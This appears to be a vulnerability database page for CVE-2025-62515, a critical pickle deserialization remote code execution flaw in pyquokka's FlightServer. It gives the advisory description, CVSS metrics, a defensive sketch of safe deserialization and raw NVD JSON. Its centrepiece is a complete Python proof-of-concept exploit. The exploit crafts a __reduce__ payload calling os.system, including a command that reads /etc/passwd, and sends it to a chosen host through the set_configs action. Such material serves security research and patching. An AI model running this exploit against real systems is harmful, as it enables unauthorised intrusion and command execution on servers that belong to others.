Security Vulnerability Report
CVE-2025-62515 CVSS 9.8 CRITICAL

CVE-2025-62515

Published: 2025-10-17 21:15:37
Last Modified: 2026-04-15 00:35:42

Description

pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads() to deserialize action bodies received from Flight clients without any sanitization or validation in the do_action() method. The vulnerable code is located in pyquokka/flight.py at line 283 where arbitrary data from Flight clients is directly passed to pickle.loads(). When FlightServer is configured to listen on 0.0.0.0, this allows attackers across the entire network to perform arbitrary remote code execution by sending malicious pickled payloads through the set_configs action. Additional vulnerability points exist in the cache_garbage_collect, do_put, and do_get functions where pickle.loads is used to deserialize untrusted remote data.
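A defensive sketch for the bug class described above, added here as an example and not taken from pyquokka or its patch: a data-only unpickler that refuses every global, a static opcode check that inspects a body without loading it, and a JSON decoder as an assumed replacement wire format for configuration actions. All function names, the config keys and both sample byte strings are constructed for illustration.

```python
import io
import json
import pickle
import pickletools

# Opcodes that import a callable or invoke one while a pickle is loaded.
RISKY = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
         "NEWOBJ", "NEWOBJ_EX", "BUILD"}


class DataOnlyUnpickler(pickle.Unpickler):
    """Accepts scalars and built-in containers; refuses every global."""
    def find_class(self, module, name):
        # A __reduce__ payload must resolve a callable here before it can run.
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def loads_data_only(body: bytes):
    """Stand-in for pickle.loads() that cannot import or call anything."""
    return DataOnlyUnpickler(io.BytesIO(body)).load()


def risky_opcodes(body: bytes) -> list:
    """List risky opcodes in body by static inspection (nothing is executed)."""
    seen = {op.name for op, _arg, _pos in pickletools.genops(body)}
    return sorted(seen & RISKY)


def decode_configs(body: bytes) -> dict:
    """Assumed replacement wire format: a JSON object of scalar settings."""
    configs = json.loads(body.decode("utf-8"))
    if not isinstance(configs, dict):
        raise ValueError("configs must be a JSON object")
    for key, value in configs.items():
        if not isinstance(value, (str, int, float, bool, type(None))):
            raise ValueError(f"config {key!r} must be a scalar")
    return configs


# Constructed samples: a plain dict, and a pickle that merely references the
# harmless builtin len() (enough to exercise the global-resolution path).
BENIGN = pickle.dumps({"batch_size": 1024, "fault_tolerance": False}, protocol=4)
REFERENCES_GLOBAL = pickle.dumps(len, protocol=4)

if __name__ == "__main__":
    print(risky_opcodes(BENIGN), risky_opcodes(REFERENCES_GLOBAL))
    print(loads_data_only(BENIGN))
```

Forbidding globals removes the code-execution path, but the unpickler still parses attacker-controlled bytes; the JSON path avoids pickle on network input altogether.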

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

pyquokka <= 0.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-62515 PoC - pyquokka pickle deserialization RCE
Exploits unsafe pickle.loads() in FlightServer.do_action()
"""
import pickle
import os
import socket
import struct
import pyarrow.flight as flight


class MaliciousPayload:
    """Crafted pickle payload that executes arbitrary commands"""
    def __reduce__(self):
        # Command to execute on the target server
        cmd = "id; whoami; uname -a; cat /etc/passwd | head -5"
        return (os.system, (cmd,))


def craft_pickle_payload(command="id"):
    """Generate a malicious pickle payload for RCE"""
    class Exploit:
        def __reduce__(self):
            return (os.system, (command,))
    return pickle.dumps(Exploit())


def exploit_flight_server(host, port=8080, command="id"):
    """
    Connect to vulnerable pyquokka FlightServer and send
    malicious payload via set_configs action
    """
    # Connect to the Flight server
    client = flight.FlightClient(f"grpc+tcp://{host}:{port}")

    # Craft the malicious action with pickle payload
    malicious_body = craft_pickle_payload(command)

    # Send via set_configs action (triggers do_action -> pickle.loads)
    action = flight.Action("set_configs", malicious_body)

    print(f"[*] Sending malicious payload to {host}:{port}")
    print(f"[*] Command to execute: {command}")

    try:
        results = list(client.do_action(action))
        print("[+] Payload sent successfully")
        for result in results:
            print(f"[+] Response: {result.body.to_pybytes().decode()}")
    except Exception as e:
        print(f"[*] Request completed (server may have crashed): {e}")


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    cmd = sys.argv[3] if len(sys.argv) > 3 else "id"
    exploit_flight_server(target, port, cmd)

# Alternative: Direct socket-based exploit for lower-level testing
# def raw_exploit(host, port):
#     import pickle
#     payload = pickle.dumps({"__reduce__": [os.system, ("id",)]})
#     # Wrap in Arrow Flight protocol format and send via TCP
#     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     sock.connect((host, port))
#     # ... (Arrow Flight gRPC framing required)
```

References

https://github.com/marsupialtail/quokka/security/advisories/GHSA-f74j-gffq-vm9p

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62515", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:36.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads() to deserialize action bodies received from Flight clients without any sanitization or validation in the do_action() method. The vulnerable code is located in pyquokka/flight.py at line 283 where arbitrary data from Flight clients is directly passed to pickle.loads(). When FlightServer is configured to listen on 0.0.0.0, this allows attackers across the entire network to perform arbitrary remote code execution by sending malicious pickled payloads through the set_configs action. Additional vulnerability points exist in the cache_garbage_collect, do_put, and do_get functions where pickle.loads is used to deserialize untrusted remote data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/marsupialtail/quokka/security/advisories/GHSA-f74j-gffq-vm9p", "source": "[email protected]"}]}}